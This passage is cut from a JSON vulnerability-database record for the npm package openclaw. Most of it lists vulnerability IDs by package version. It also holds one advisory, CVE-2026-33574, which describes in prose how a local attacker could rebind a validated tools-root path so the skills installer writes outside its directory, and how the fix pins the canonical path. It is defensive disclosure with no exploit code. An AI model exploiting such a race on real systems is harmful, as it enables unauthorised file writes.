rability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2-beta.1"}],"aliases":["GHSA-g87j-gm7p-6vw2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h3yu-7bfc-vqhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50896?format=json","vulnerability_id":"VCID-h4av-vgqn-aqcn","summary":"OpenClaw's skills-install-download can be redirected outside the tools root by rebinding the validated base path\nOpenClaw's skills download installer validated the intended per-skill tools root lexically, but later reused that mutable path while downloading and copying the archive into place. If a local attacker could rebind that tools-root path between validation and the final write, the installer could be redirected to write outside the intended tools directory.\n\nThe fix pins the canonical per-skill tools root immediately after validation and derives later download/copy paths from that canonical root, so rebinding the lexical path fails closed instead of redirecting the write.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33574","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02175","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02162","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02182","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33574"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574","reference_id":"CVE-2026-33574","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574"},{"reference_url":"https://github.com/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vhwf-4x96-vqx2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerabi